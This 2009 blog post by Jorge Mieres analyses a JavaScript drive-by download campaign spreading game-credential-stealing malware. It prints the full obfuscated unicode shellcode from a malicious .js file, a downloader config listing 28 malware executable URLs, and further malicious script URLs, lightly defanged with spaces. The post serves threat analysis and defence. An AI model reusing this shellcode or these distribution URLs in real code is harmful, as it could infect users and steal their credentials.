Friday, February 6, 2009

Exploitation of vulnerabilities through JS

Exploiting vulnerabilities across different types of file format has become common currency in a highly used by the creators and disseminators of malware.

These methods, which are also combined with different strategies, they become a time bomb that detonates with the simple action of accessing a page maliciously manipulated to accommodate the strategies of attack.

Numerous cases, such as taking advantage of various weaknesses exploited through the archives .js, .swf, .pdf, .mp3, even pretending to be files .css, make clear that any type of file is free to be used as channel spread much less as a vector for infection.

In recent weeks, a wave file .js is being used to redirect the download of malicious code through obfuscated scripts that hide in the body of the JavaScript like the following that is hosted at URL http://www.710sese .cn/a1/realdadong. js in md5 hash which is d1094b907dfe99784b206d2ae9b1fe97:

var mybr = unescape("%u6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%
ue8e0%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u0870%uec81%u0200%u0000%uec8b
%ue8bb%u020f%u8b00%u8503%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d%u6856%ufe
98%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e%uec0e%ua3e8%u0000%u8900%u0445%u6856%u79c1
%ub8e5%u95e8%u0000%u8900"+"%u1c45%u6856%uc61b%u7946%u87e8%u0000%u8900%u1045%u6856%ufcaa
%u7c0d%u79e8%u0000%u8900%u0845%u6856%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%
u8900%u3303%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00%u285d%uff53%u0455%u6850%u1a3
6%u702f%u3fe8%u0000%u8900%u2445%u7f6a%u5d8d%u5328%u55ff%uc71c%u0544%u5c28%u652e%uc778%u0
544%u652c%u0000%u5600%u8d56%u287d%uff57%u2075%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%
uc481%u0200%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b%u560c%u738b%u8b3c%u1
e74%u0378%u56f3%u768b%u0320%u33f3%u49c9%uad41%uc303%u3356%u0ff6%u10be%uf23a%u0874%ucec1%
u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5%ueb8b%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u04
8b%u038b%u5ec5%u595b%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100%u0000%ua4f3%
uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07%u6474%uc76c%u0447%u006c%u0000%uff57%u0455%u458
9%uc724%u5207%u6c74%uc741%u0447%u6c6c%u636f%u47c7%u6108%u6574%uc748%u0c47%u6165%u0070%u
5057%u55ff%u8b08%ub8f0%u0fe4%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700%u55ff%
u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474%uf9e2%u12eb%u348d%u5508%u406a%u046a%uff5
6%u1055%u06c7%u0c80%u0002%uc481%u0100%u0000%ue8c3%uff69%uffff%u048b%u5324%u5251%u5756%uec
b9%u020f%u8b00%u8519%u75db%u3350%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500%u833e%
u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f%u8318%u6afb%u2575%uc083%u8b04%ub830
%u0fe0%u0002%u0068%u0000%u6801%u1000%u0000%u006a%u10ff%u0689%u4489%u1824%uecb9%u020f%uff0
0%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00%ue820%ufdda%uffff%u7468%u7074%u2f3a%u642f%u772e%u6965
%u6b78%u632e%u6d6f%u6e2f%u7765%u612f%u2e31%u7363%u0073");

The issue is that between the lines of this script obfuscated, running downloading a binary file from a different URL, called a1.css. This binary is a malware.

Furthermore, between half of the entire process of infection, which lasts only a few seconds, connecting to the sites txt.hsdee .com and www.wdswe .com, where, since the former makes a Drive-by Update on file oo.txt for when responds with an 200 "OK", download the binaries in the file. The first of them since http://www.wdswe .com/new/new1. exe (md5: 1c0b699171f985b1eab092bf83f2ad37).

The information is read from the text file is as follows:

[file]
open=y
url1=http://www.wdswe .com/new/new1 .exe
url2=http://www.wdswe .com/new/new2 .exe
url3=http://www.wdswe .com/new/new3 .exe
url4=http://www.wdswe .com/new/new4 .exe
url5=http://www.wdswe .com/new/new5 .exe
url6=http://www.wdswe .com/new/new6 .exe
url7=http://www.wdswe .com/new/new7 .exe
url8=http://www.wdswe .com/new/new8 .exe
url9=http://www.wdswe .com/new/new9 .exe
url10=http://www.wdswe .com/new/new10 .exe
url11=http://www.wdswe .com/new/new11 .exe
url12=http://www.wdswe .com/new/new12 .exe
url13=http://www.wdswe .com/new/new13 .exe
url14=http://www.wdswe .com/new/new14 .exe
url15=http://www.wdswe .com/new/new15 .exe
url16=http://www1.wdswe .com/new/new16 .exe
url17=http://www1.wdswe .com/new/new17 .exe
url18=http://www1.wdswe .com/new/new18 .exe
url19=http://www1.wdswe .com/new/new19 .exe
url20=http://www1.wdswe .com/new/new20 .exe
url21=http://www1.wdswe .com/new/new21 .exe
url22=http://www1.wdswe .com/new/new22 .exe
url23=http://www1.wdswe .com/new/new23 .exe
url24=http://www1.wdswe .com/new/new24 .exe
url25=http://www1.wdswe .com/new/new25 .exe
url26=http://www1.wdswe .com/new/new26 .exe
url27=http://www1.wdswe .com/new/new27 .exe
url28=http://www1.wdswe .com/new/new28 .exe
count=28

This will produce the number of malicious code infection, most of them designed to steal authentication credentials for online games like WoW.

Some other URL's used to spread malware in the same way are:

http://97.haowyt .com/js/baidu .js
http://97.haowyt .com/js/baidu .js
http://www.163wyt .com/js/yahoo .js
http://www.710sese .cn/a1/hohogl .js
http://www.710sese .cn/a1/wokaono .js
http://www.710sese .cn/a1/woriniss .js
http://qq.18i16 .net/lzz .js
http://qq.18i16 .net/bf .js
http://qq.18i16 .net/realplay .js
http://qq.18i16 .net/new .js
http://qq.18i16 .net/cx .js
http://www.baomaaa .cn/a1/realdadong .jshttp://www.baomaaa .cn/a1/hohogl .js
http://www.baomaaa .cn/a1/wokaono .js
http://www.baomaaa .cn/a1/woriniss .js
http://tj.gan7788 .com/js/js .js
http://sss.2010wyt .net/r .js
http://sss.2010wyt .net/614 .js

Despite the job by the creators of malware, advanced techniques of infection, there is an element that can avoid becoming victims of similar attacks focused purely on keeping updates completely up to date, including applications.

# Jorge Mieres
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)